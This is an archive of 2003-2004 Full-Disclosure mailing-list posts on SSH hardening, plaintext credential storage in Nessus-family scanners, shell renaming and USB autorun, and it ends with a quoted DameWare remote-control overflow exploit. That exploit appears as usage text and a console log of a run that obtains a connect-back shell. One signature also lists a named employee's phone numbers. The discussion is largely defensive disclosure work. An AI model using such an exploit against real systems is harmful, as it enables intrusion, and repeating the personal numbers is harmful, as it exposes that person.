On Mon, 18 Oct 2004 19:25:16 -0400, Micheal Espinola Jr [EMAIL PROTECTED] wrote: Yea, but the l0pht was never an exploit group. They were the most true hackers I have ever personally known. But it should also be considered that way back then, the youngest member was in his teens, while the rest were significantly older than him. Now, that youngest member (Kingpin) should be about 30 y/o. Their maturity and _responsibility_ to their passions has always kept them a cut above in the professional game. What I was trying to say is that there are other less visible success stories of hacker turned information security professional, that not all of the guys who were innovative in the pre-WWW days drifted off to become old stoner geeks (well, some did), but many actually matured into responsible adults with a job, a mortgage, and a strong sense of ethics and self control... and a passion for a good hack. On Mon, 18 Oct 2004 17:38:18 -0500, Kevin [EMAIL PROTECTED] wrote: Scratch a thirty-something lead InfoSec consultant from any major consulting firm (including the big four), and chances are you'll find a 31337 Hax0r from the 90's. And this is excluding the obvious L0pht-@Stake-Symantec progression ^^^ Yes, L0pht a highly visible example, but not the sole exception to the rule; there are more than a few individuals who, seeing their name in an industry journal, the first thing that comes to my mind is not the respected consulting firm they work for now, but the hacker handle they used back in the old h/p/v scene. Kevin ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Any update on SSH brute force attempts?
On Sat, 16 Oct 2004 14:57:31 +1300, James Riden [EMAIL PROTECTED] wrote: Jay Libove [EMAIL PROTECTED] writes: What are you doing/changing about your SSH configurations to reduce the possibility of these attacks finding any kind of hole in the OpenSSH software (that's what I run, so that's the only version I'm particularly concerned about) ? Are you doing anything at all? Use one time passwords (OTP, e.g. S/Key). Restrict which addresses are allowed to connect (via /etc/hosts.allow), and/or which user accounts are allowed from which sources (using AllowUsers in sshd_config). I l prefer to bind the listener to a specific IP address on hosts with multiple addresses, the BOFH might choose to have a tarpit *:22/TCP listener on hosts with many alias IPs.. One or more of the following, depending on local requirements: * Run on a non-standard port - this will stop brain-dead scanning programs * Use key-based auth instead of passwords * Restrict what IP addresses are allowed to connect (at your firewall) * Disable root logins * Use john or crack to audit password strength * Use logwatch or similar to monitor failed login attempts * Make a honeypot and see what techniques people are trying out (Everyone's forcing version 2 of the protocol, right?) $ sudo tail -5 /etc/ssh/sshd_config Protocol 2 ListenAddress 172.23.97.2 MaxAuthTries 2 PermitRootLogin no LogLevel VERBOSE $ exit I'm sorely tempted to forgo SSH for telnet encapsulated in SSL (via stunnel), with non-reusable passwords. Anybody else remember Stel? Kevin ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Possibly a stupid question RPC over HTTP
On Wed, 13 Oct 2004 15:33:13 -0700 (PDT), S G Masood [EMAIL PROTECTED] wrote: Yeah, it certainly is a security risk in several ways. Decoding and inspecting HTTPS traffic at the perimeter before it reaches the server becomes an absolute necessity if RPC over HTTPS is implemented. Same with RPC over HTTP. There was a Microsoft employee on-site for a few days this summer, and I noticed one day that he was reading MS email messages in Outlook 2003 (not OWA) from his laptop while connected to *our* private LAN. Any smart enterprise blocks all POP/IMAP/MAPI protocols both inbound and outbound, so this made me more than a bit suspicious... When I checked the proxy traffic from the DHCP address assigned to his laptop, I saw normal-lookup HTTP requests followed by additional RPC headers. Turns out the employee he was working with helpfully gave him the information to use the outbound proxy, and after configuring proxy settings in the control panel, it just worked. Our visitor went back to Redmond before I could get approval from management to modify the firewall configuration to explicitly block RPC-over-HTTP :( Kevin ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Clear text password exposure in Datakey's tokens and smartcards
Surely if the user is entering a passphrase then the same problem exists - that of effectively eavesdropping that communication from the keyboard? Ignoring the initial expense for a moment, wouldn't it have made a lot of sense to include the keypad actually on the cards? Obviously, card readers would need to be contructed such that the keypad part of the card would be exposed during use. The keypad security could then rely on the tamper resistant properties of the rest of the card. From a costs perspective, I would guess that the actual per-card cost increase would be minimal if hundreds of millions of these cards were produced. Kev Lionel Ferette wrote: Note that this is true for almost all card readers on the market, not only for Datakey's. Having worked for companies using crypto smart cards, I have conducted a few risk analysis about that. The conclusion has always been that if the PIN must be entered from a PC, and the attacker has means to install software on the system (through directed viruses, social engineering, etc), the game's over. The only solution against that problem is to have the PIN entered using a keypad on the reader. Only then does the cost of an attack raise significantly. But that is opening another can of worms, because there is (was?) no standard for card readers with attached pin pad (at the time, PC/SCv2 wasn't finalised - is it?). at least some cards are supporting des passphrases to implement secured communication channels but I suppose this feature is not that widely in use how many card owners are prepared to remember both PIN codes and passphrases... toomas -- Kevin Sheldrake MEng MIEE CEng CISSP Electric Cat (Bournemouth) Ltd ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Full-Disclosure digest, Vol 1 #1767 - 14 msgs
This makes no sense.. YOur saying I emailed a virus? The bank firewall will not allow me to email a virus I dont think. Thanks, Kevin Holcomb W2K System Administrator/Database Administrator Bank of America Decision Support Applications (DSA): Campaign Execution and Reporting (CER) kevin.holcomb@ bankofamerica.com (w) 704-388-7361 (c) 704-309-6178 (pager) 877-385-0652 --- Confidentiality Statement: This message is for the designated recipient only and may contain privileged, proprietary, or otherwise private information. If you are not the intended recipient, you may not copy, disclose, or distribute this message to anyone. If you have received it in error, please notify the sender immediately and delete the original. Any other use of the e-mail by you is prohibited. --- -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of [EMAIL PROTECTED] Sent: Wednesday, July 14, 2004 10:57 AM To: [EMAIL PROTECTED] Subject: Full-Disclosure digest, Vol 1 #1767 - 14 msgs The original message content contained a virus or was blocked due to blocking rules and has been removed. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Mozilla Security Advisory 2004-07-08
Dan Veditz wrote in the Mozilla Security Advisory, dated July 7, 2004... Solution: We urge people to install the patch available on mozilla.org or install the latest version of the software. http://www.mozilla.org/security/shell.html -Dan Veditz Mozilla Security Group Well done, Mozilla Security team. Meanwhile, it will probably be another 6 months until MS gets around admitting this is a legitimate problem in IE and getting a fix available (unless it happens to be fixed in WinXP SP2, coming RSN to a PC near you ;-). Responsive like this is one of the main reasons that I use Mozilla whenever possible. -kevin wall Qwest IT - Application Security Team ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] No shell = secure?
Matthias Benkmann wrote... I can't say I've looked at much exploit-code so far but the POC exploits to gain root I've seen for Linux all executed /bin/sh. I'd like to know if this is true for in-the-wild exploits to root a box, too. If so, would it be a useful security measure to rename /bin/sh and other shells (after making sure that everything that needs them has been updated to the new name, of course)? No; sometimes they use other shells, such as /bin/bash, /bin/ash, /bin/zsh, etc. or else execute a single command at a time. Also, presumably, you'd still have to set SHELL env variable, so they could presumably just execute $SHELL in many cases. Worst of all, you now have yourself a maintenance nightmare. Think of how many shell scripts where you'd have to change the #!/bin/sh to whatever full path name you've switched the shell to. And you'd have to do this whenever you install a vendor update, an RPM, etc. Yuck! No thanks! I'm aware that a dedicated attacker who targets my box specifically will not be stopped by this but I don't think I have such enemies. I also know that DOS is still possible, but that's also not my concern. I'm simply worried about script kiddies using standard exploits against random servers on the Internet rooting my box faster than I can patch it. Well, it probably would stop the script kiddies--for awhile at least. But see above. Also, if you keep on top of patches, have appropriate firewall rules and other access control mechanisms in place, script kiddies are not all that hard to keep out. If renaming the shell is not enough, how about renaming all of the standard Unix top-level directories (such as /bin, /etc,...)? Would that defeat standard exploits to root a box? Man, that would REALLY become a maintenance nightmare. You'd have to customize almost all RPMs, vendor patches, etc. before installing them. --- -kevin wall Qwest IT - Application Security Team The reason you have people breaking into your software all over the place is because your software sucks... -- Former whitehouse cybersecurity advisor, Richard Clarke, at eWeek Security Summit ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] No shell = secure?
As has been discussed, really all you're doing is preventing against canned exploits. You're also going to be jumping ALOT of hoops to do this. There are different ways to achieve the same result, look into canary stack protection (such as propolice), and a write or execute stack, such as W^X on OpenBSD or PaX on Linux.Applying one of these will at least force an attacker to write a custom exploit for your configuration, and will give you alot less headaches than running without shells or renaming file structure. However as has been said many times before, security through obscurity isn't really security at all. It can buy you time and deter alot of folks, but it won't make you secure. Ponds On Fri, 9 Jul 2004 21:14:07 +0545, npguy [EMAIL PROTECTED] wrote: On Friday 09 July 2004 08:19 am, hax wrote: 2) That'd stop a lot of skript kiddies, I guess, but it'd be pretty trivial to just rework the shellcode to call some other command instead of /bin/sh. if this is single target. attacker can guess your setting and keeping executing any commands it could possible target to execute more attack what about wget from shellcode. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: USB risks (continued)
Many USB keys have hardware switches to make them read only. With Windows 2000 or Windows XP, no special drivers are required to read USB keys. Autorun works on removable USB CD drives. - Original Message - From: RSnake [EMAIL PROTECTED] To: Gadi Evron [EMAIL PROTECTED] Cc: Harlan Carvey [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Friday, June 18, 2004 7:54 PM Subject: Re: USB risks (continued) Autorun doesn't work with USB keyfobs. Actually, it is my understanding that it doesn't work on any media that is deemed writable and removable. The distinction between USB devices and CDs is that the media is writeable, but the drives aren't removeable on CDs. That of course isn't true if you have a USB drive, but I think part of the deal there is that you need to install special drivers to even read USB CD drives. That's kinda a weird distinction, but I researched it quite a bit earlier this year and that's just how they define it. With the advent of bootable USB devices, and more USB support, you can pretty much bet things will change, but for right now, autorun isn't an issue. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Imaging Operating Systems
Maarten wrote: This is an interesting thread... But out of curiosity, is it also possible to do backup / restores using readily available linux tools? I'd like to be able to do something like running dd over a network connection, or tar, or whatever other tool. In that case, a bootable CD is all you need. But I'm unsure how to do that... Maarten one suggestion make the PC dual boot: Windows and Linux with the Linux partition larger. boot Linux and dd the raw Windows partition to a Linux file boot Windows and play with malware boot Linux and dd the file back out to the Windows partition rince and repeat... I used this method some years back with Win95 and FreeBSD but I had a very small Win95 partition. See also: www.feyrer.de/g4u/Ghost for Unix ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Nessus stores credentials in plain text
Q. Does Nessus use username and password data and store it in plaintext locally even after the client connections are long gone? A. Yes. If is not ok for vulnerability scanners like ISS and others to do this, why is it ok for Nessus to do this? - Original Message - From: Raymond Morsman [EMAIL PROTECTED] To: ~Kevin Davis³ [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Sunday, March 28, 2004 4:27 PM Subject: Re: [Full-Disclosure] Nessus stores credentials in plain text On Sat, 2004-03-27 at 17:47, ~Kevin Davis³ wrote: Many people would disagree that storing passwords in plaintext is not a vulnerability. This includes entities like ISS who were doing the same thing and once realized it changed it. I don't see how a plaintext username and password is simply system data and not also credentials. And guess what? Nessus itself has several plugins that check for plaintext passwords in other applications. Q: Does Nessus use this data for its own persona-check? A: No, it uses it for client connections. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Nessus stores credentials in plain text
Many people would disagree that storing passwords in plaintext is not a vulnerability. This includes entities like ISS who werre doing the same thing and once realized it changed it. For many, it is not a matter of merely being nice to encrypt plaintext passwords, but a requirement. You are giving the keys to the kingdom away for free here. - Original Message - From: Raymond Morsman [EMAIL PROTECTED] To: ~Kevin Davis³ [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Saturday, March 27, 2004 4:08 AM Subject: Re: [Full-Disclosure] Nessus stores credentials in plain text On Sat, 2004-03-27 at 06:01, ~Kevin Davis³ wrote: I have posted this issue to a couple entities like bugtraq and CERT with no response. I mentioned this issue to an organization And so it should be. These are not vulnerabilities in the pure sense of the word. What you call credentials are nothing more than system data for Nessus and therefore not an issue for Nessus. You can't use MD5 on systemdata. However, I must agree that it would be nice if this information would be encrypted with the users password. Raymond. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Nessus stores credentials in plain text
Many people would disagree that storing passwords in plaintext is not a vulnerability. This includes entities like ISS who were doing the same thing and once realized it changed it. I don't see how a plaintext username and password is simply system data and not also credentials. And guess what? Nessus itself has several plugins that check for plaintext passwords in other applications. I guess it has a different standard for itself as opposed to other applications. For many, it is not a matter of merely being nice to encrypt plaintext passwords, but a requirement. You are giving the keys to the kingdom away almost for free here. - Original Message - From: Raymond Morsman [EMAIL PROTECTED] To: ~Kevin Davis³ [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Saturday, March 27, 2004 4:08 AM Subject: Re: [Full-Disclosure] Nessus stores credentials in plain text On Sat, 2004-03-27 at 06:01, ~Kevin Davis³ wrote: I have posted this issue to a couple entities like bugtraq and CERT with no response. I mentioned this issue to an organization And so it should be. These are not vulnerabilities in the pure sense of the word. What you call credentials are nothing more than system data for Nessus and therefore not an issue for Nessus. You can't use MD5 on systemdata. However, I must agree that it would be nice if this information would be encrypted with the users password. Raymond. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Nessus stores credentials in plain text
I have posted this issue to a couple entities like bugtraq and CERT with no response. I mentioned this issue to an organization today which was considering using Nessus as a vulnerability scanner to assess their network security issues and this was in violation with their security policy so they are reconsidering using it. Please read below... Software Vendor: Nessus (www.nessus.org)Software Package: Nessus Versions Affected: 2.0.10a (possibly others)Synopsis: Username and password for various accounts stored in unencrypted plain text Issue Date: Feb 22, 2004 Vendor Response: Vendor notified December 4, 2003 Vendor declined to resolve issue 1. Summary The open source Nessus Vulnerability scanner stores the credentials ofvarious types of accounts in unencrypted plain text in a configuration file. 2. Problem Description The .nessusrc files stores username and password information for various types of accounts in unencrypted plain text. Those parameters are typically set from the native nessus client but also can be added manually. When setting these parmetersfrom the Nessus client, the user is also not informed of this sensitive informationbeing stored insecurely. This potentially affects the following types of accounts: FTPIMAPPOP2POP3NNTPSNMPSMB (Windows NT Domain) 3. Solution None at this time. A lengthy discussion with the vendor resulted in the vendor's decision that this was not a security risk that warrants resolution on.
[Full-Disclosure] NEWT Scanner stores credentials in plain text
I have posted this issue to a couple entities like NTbugtraq and CERT with no response. Please read below... Software Vendor: Tenable Security (www.tenablesecurity.com)Software Package: Newt Versions Affected: 1.4 and earlier (and possibly 1.5)Synopsis: Username and password for various accounts stored in unencrypted plain text Issue Date: Feb 22, 2004 Vendor Response: Vendor notified December 4, 2003 Vendor declined to resolve issue 1. Summary NEWT is a commercial Windows port of the open source Nessus Vulnerability scanner byTenable security. Newt stores the credentials of various types of accounts in unencrypted plain text in a configuration file. 2. Problem Description The config.xml files stores username and password information for various types of accounts in unencrypted plain text. Those parameters are typically set from the NEWT Scanner interface. When setting these parameters, the user is also not informed of this sensitive information being stored insecurely. This potentially affects the following types of accounts: FTPIMAPPOP2POP3NNTPSNMPSMB (Windows NT Domain) Typically this config file is stored locally at the following location: \Documents and Settings\Username\Tenable\NeWT\config\config.xml 3. Solution None at this time. A lengthy discussion with the vendor resulted in the vendor's decision that this was not a security risk that warrants resolution on.
[Full-Disclosure] NessusWX stores credentials in plain text
Software Vendor: NessusWX (nessuswx.nessus.org)Software Package: NessusWX Versions Affected: 1.4.4 and possibly earlier versionsSynopsis: Username and password for various accounts stored in unencrypted plain text Issue Date: Feb 22, 2004 Vendor Response: Vendor notified December 4, 2003 Vendor claiming to be working on issue 1. Summary NesussWX is a GPL Windows client for the open source Nessus Vulnerability scanner. NessusWX stores the credentials of various types of accounts in unencrypted plain text in a configuration file. 2. Problem Description The user saves specific scan configuration settings in sessions created withinNessusWX. For every session a directory is created named the same as thesession name with a .session appended to it. For instance in the case of asession named MySession, the default location for the session configurationfiles would be in the directory C:\NessusDB\MySession.session. Every sessioncan save unique Nessus plugin configuration settings. Among these areusername/password settings for various types of accounts. These options are accessed by selecting a session, and then in the main menu under "Session" selecting the "Properties" submenu. This will display a multi-tabbed dialog. Select the "Plugins" tab and then click on the "Configure Plugins" button. A listbox will be displayed and near the bottom of the list there will be an item named "Login Configurations". When the user saves this logon information, both the usernames and passwords are saved in plaintext in the above specified path in a file named preferences. Further,after this information is saved to the file, if the user goes back and removes this information using the GUI, the user interface indicates that the information has been removed but this is misleading because it is stillretained in the configuration file. This behavior is somewhat inconsistent.Sometimes the entire username/password data is retained in the file andsometimes the first character of each is removed. When setting these parameters, the user is also not informed of this sensitive information being stored insecurely. This potentially affects the following types of accounts: FTPIMAPPOP2POP3NNTPSNMPSMB (Windows NT Domain) 3. Solution None at this time. The vendor agreed to fix the problem by allowing the user to password protect the data and also have the data removed properly. It has been over 60 days and the patch has not been made available.
Re: [Full-Disclosure] stenagrophy software recommendations
We use S-Tools in my security class, it seems to work out well, unzipped is like 500k, drag and drop gui. stenographic encryption program. Steg is not crypto, although they are very often used in tandem. However, S-Tools can also do symmetric crypto with a few good ciphers. -ponds ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: What's wrong with this picture?
Somebody want to explain to this guy that there's a difference between publicly available exploits and 0-day exploits circulating in the underground? http://news.bbc.co.uk/1/hi/technology/3485972.stm Scary part is that he's a high honcho at Microsoft's security unit. So, I see... according to Mr. Aucsmith's logic, if we NEVER issue security patches, we'll have LESS security vulnerabilities. Yeah, right. Boy, guess we're all out of a job then. (Actually, it's attitudes like this that will keep us employed for a very long time. ;-) -kevin --- Kevin W. Wall Qwest Information Technology, Inc. int i; /* WARNING: This code may be intellectual property of SCO. * Use at your own risk! */ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Absurd Microsoft QA? The Return of the username@password...
* Here's the final straw On February 10, 2004 Microsoft released a patch that restores the [EMAIL PROTECTED]: functionality in URL references! * It seems they are trying to hide this fact as this is not widely publicized and it is NOT being labeled as an IE patch nor a even a security patch! Probably because it is NOT a security patch, nor does it restore the embedded-credentials functionality. It addresses the specific problem (created by the 04 patch )of not being able to pass user credentials in an XML Open() call. From the M$ article: This fix will only enable the scenario where user credentials are passed as parameters in the Open() method call. It will not enable scenarios where the user credentials are embedded in the URL. Ks ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] DreamFTP Server 1.02 Buffer Overflow
Tsk- Quit being a security expert and just listen to the vulns as they come in like a good puppy ^^ Anyhow... Yeah... What's with that? . Call an orange an orange. Not a dog. (Not you Bill- The original poster) ~ So, that would be a format string vuln, not a buffer overflow, right? ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Interesting side effect of the new IE patch
Actually- there is a registry key you can put in to change back to the 'correct' user:[EMAIL PROTECTED] way of processing... So it DOES still have that in there to follow RFC- Just needs to be activated first. (It's in a newer KB article.) ~ - Original Message - From: Andreas 'GlaDiaC' Schneider [EMAIL PROTECTED] To: Schmehl, Paul L [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Wednesday, February 04, 2004 6:00 PM Subject: Re: [Full-Disclosure] Interesting side effect of the new IE patch -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 The Netscape project is dead... you should check the Mozilla Suite or Mozilla Firebird :) http://www.mozilla.org/ Schmehl, Paul L wrote: | Since the IE browser no longer allows the @ sign in a uri, you can no | longer download files from some vendors' sites. Still works in Netscape | 7.1, however. So far I've found three sites, but I haven't done an | extensive investigation. These are just ones that I've stumbled across. | The most interesting one is NAI's download site for enterprise licensed | software packages. (I suppose, if one was ambitious, one could google | for @?) | | I wonder how many other vendors are cheating on the RFCs to facilitate | browser interaction? | | Paul Schmehl ([EMAIL PROTECTED]) | Adjunct Information Security Officer | The University of Texas at Dallas | AVIEN Founding Member | http://www.utdallas.edu/~pauls/ | | ___ | Full-Disclosure - We believe in it. | Charter: http://lists.netsys.com/full-disclosure-charter.html | | - -- http://www.linux-gamers.net - your online gaming resource -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.2 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org iD8DBQFAIXmLf94+j/M+P8YRAoW/AJ97D0iN5k/ETOaDgX6zKw6bMyJ1HwCggj7u gPbxDI92Lv7A2kcU9vnQKYU= =oTA2 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] antivirus s/w
One product you might want to look into is Cisco Security Agent or CSA. CSA runs on all NT Class machines and works as a kind of a Personal Firewall. It does this through OS behavior monitoring and then reports any suspicious activity to a centralized console called VMS. The VMS console can read the log information leading up to a successful block and compare that information from other CSA agents running on other machines to determine if a new rule needs to be generated and pushed out to the clients to block a new worm or attack that may be active on your network. CSA's rules can be customized down to a very detailed level and provides a proactive approach for combating new viruses and system compromise attempts and it does not need any definitions to do so, because it works by monitoring OS behavior. CSA will also work in combination with Cisco VPN concentrators by only allowing machines that have CSA running to connect to the VPN. Here are some links for more info. http://www.cisco.com/en/US/products/sw/secursw/ps5057/index.html http://www.cisco.com/en/US/products/sw/cscowork/ps2330/ If I made any mistakes in my description please let me know as I only told this information at Cisco Security Seminar and I may have forgot some things or explained them incorrectly. Kevin -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Gadi Evron Sent: Tuesday, January 27, 2004 5:10 AM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] antivirus s/w Patrick J Okui wrote: Hi all, (.*flames.*/dev/null) 1. I'm trying to decide on an AV solution for a campus wide n/w. I'm basically looking for something that'll respond as quick as possible to new viruses. I'm currently evaluating NAV, and Fprot. Any other suggestions/recomendations? To install on every workstation or to filter malware from email? 2. Fprot have an AV 4 linux/bsd workstationsdoes this just scan for virii from infected winbloze or are there un*x virii i'm ignorant about? A better question would be.. rootkits? Gadi Evron ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] antivirus s/w
Try trend Micro. -Original Message- From: Randal L. Schwartz [mailto:[EMAIL PROTECTED] Sent: Tuesday, January 27, 2004 9:52 AM To: Patrick J Okui Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] antivirus s/w Patrick == Patrick J Okui [EMAIL PROTECTED] writes: Patrick Hi all, Patrick (.*flames.*/dev/null) Patrick 1. I'm trying to decide on an AV solution for a campus wide n/w. Patrick I'm basically looking for something that'll respond as quick as Patrick possible to new viruses. I'm currently evaluating NAV, and Fprot. Patrick Any other suggestions/recomendations? PLEASE MAKE SURE that it doesn't send email responses. I'm getting 500 mydoom an hour. I can filter those. I'm getting 1500 AV-responses an hour. I can't filter those. AV response email is PART OF THE PROBLEM now, not PART OF THE SOLUTION. -- Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095 [EMAIL PROTECTED] URL:http://www.stonehenge.com/merlyn/ Perl/Unix/security consulting, Technical writing, Comedy, etc. etc. See PerlTraining.Stonehenge.com for onsite and open-enrollment Perl training! ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server Overflow Exploit
Hi all! I'm sorry for my absence from the list for the past few months, but I have been very busy traveling outside the US, and my mail account was experiencing problems. Now that I am receiving the messages again, I have been playing catch up, by reading the old posts. I do have some good news, and was hoping that some of you might be able to assist me. I have been commissioned by Wiley Sons to write a second book, which is tentatively titled, The Art of Intrusion. This book will chronicle detailed accounts of real, untold hacks by the perpetrators who did it, and I will provide a security analysis and described how the attack could be mitigated/prevented in today's environment. I am going to tell the story from the perpetrator's stance, not just from research obtained from law enforcement officials and records. I am looking for former/retired hackers that would be willing to tell me the details of their sexiest hack. I am not interested in the run-of-the-mill attacks such as, exploiting RPC DCOM, but rather creative ones that incorporated technical, physical and/or social engineering aspects. I am offering $500 for the most provocative story that makes it into the book, and if the person wishes, we can protect their anonymity by the use of a handle. All contributors selected for the book, will receive a copy of both books autographed by the authors. I should have more information up on FreeKevin.com today, as well as DefensiveThinking.com. If someone would like to contact me with a story or a possible lead on a storyteller, please write to me at [EMAIL PROTECTED], or call at (310)689-7229. I would appreciate any assistance you can offer. All my best, Kevin Mitnick -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Adik Sent: Friday, December 19, 2003 8:38 AM To: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server Overflow Exploit DameWare Mini Remote Control Server Exploit C:\xploits\dmwaredmware ...oO DameWare Remote Control Server Overflow Exploit Oo... -( by Adik netmaniac[at]hotmail.KG )- - Versions vulnerable: = DWRCS 3.72.0.0 - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3 WinXP SP1 Usage: dmware TargetIP TargetPort YourIp YourPort eg: dmware 10.0.0.1 6129 10.0.0.2 21 C:\xploits\dmwaredmware 192.168.63.130 6129 192.168.63.1 53 ...oO DameWare Remote Control Server Overflow Exploit Oo... -( by Adik netmaniac[at]hotmail.KG )- - Versions vulnerable: = DWRCS 3.72.0.0 - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3 WinXP SP1 [*] Target IP: 192.168.63.130 Port: 6129 [*] Local IP: 192.168.63.1Listening Port: 53 [*] Initializing sockets... [ OK ] [*] Binding to local port: 53...[ OK ] [*] Setting up a listener...[ OK ] OS Info : WIN2000 [ver 5.0.2195] SP String : Service Pack 3 EIP: 0x77db912b (advapi32.dll) [*] Constructing packet for WIN 2000 SP: 3... [ OK ] [*] Connecting to 192.168.63.130:6129...[ OK ] [*] Packet injected! [*] Connection request accepted: 192.168.63.130:1056 [*] Dropping to shell... Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32exit exit [x] Connection closed. C:\xploits\dmware -- cheerz, Adik ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server Overflow Exploit
The difference is that I'm offer a $500 for the best story of a single hack, and I'm willing to pay $200 for each story that makes the final draft. Markoff would not agree to pay one dime. Cheers, Kevin Mitnick Check out http://www.zdnet.com.au for the story -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jelmer Sent: Friday, December 19, 2003 4:03 PM To: Kevin Mitnick; 'Adik'; [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server Overflow Exploit If this is legit from a /. interview : --snip-- John Markoff had first libeled me in his book, Cyperpunk, which he co-authored with his former wife, Katie Hafner. In and around 1990, Markoff and Hafner contacted me to request my participation for a book about three hackers, including myself. In considering their request, I asked about their budget to compensate me for my time and/or life story rights. Both Markoff and Hafner were unwilling to compensate me as a source, because it was unethical. I explained that it was unethical for me to give them my story for free. We were at an impasse --snip-- from the site : --snip-- If your story makes it into the book, you'll receive a free copy of my first book, The Art of Deception, plus a rare Advanced Reader's Copy of the new one with your story in it -- both signed by me with a personal inscription to you in your real name or your handle or pseudonym. --snip-- Thats definatly more ethical ;) - Original Message - From: Kevin Mitnick [EMAIL PROTECTED] To: 'Adik' [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Saturday, December 20, 2003 12:30 AM Subject: RE: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server Overflow Exploit Hi all! I'm sorry for my absence from the list for the past few months, but I have been very busy traveling outside the US, and my mail account was experiencing problems. Now that I am receiving the messages again, I have been playing catch up, by reading the old posts. I do have some good news, and was hoping that some of you might be able to assist me. I have been commissioned by Wiley Sons to write a second book, which is tentatively titled, The Art of Intrusion. This book will chronicle detailed accounts of real, untold hacks by the perpetrators who did it, and I will provide a security analysis and described how the attack could be mitigated/prevented in today's environment. I am going to tell the story from the perpetrator's stance, not just from research obtained from law enforcement officials and records. I am looking for former/retired hackers that would be willing to tell me the details of their sexiest hack. I am not interested in the run-of-the-mill attacks such as, exploiting RPC DCOM, but rather creative ones that incorporated technical, physical and/or social engineering aspects. I am offering $500 for the most provocative story that makes it into the book, and if the person wishes, we can protect their anonymity by the use of a handle. All contributors selected for the book, will receive a copy of both books autographed by the authors. I should have more information up on FreeKevin.com today, as well as DefensiveThinking.com. If someone would like to contact me with a story or a possible lead on a storyteller, please write to me at [EMAIL PROTECTED], or call at (310)689-7229. I would appreciate any assistance you can offer. All my best, Kevin Mitnick -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Adik Sent: Friday, December 19, 2003 8:38 AM To: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server Overflow Exploit DameWare Mini Remote Control Server Exploit C:\xploits\dmwaredmware ...oO DameWare Remote Control Server Overflow Exploit Oo... -( by Adik 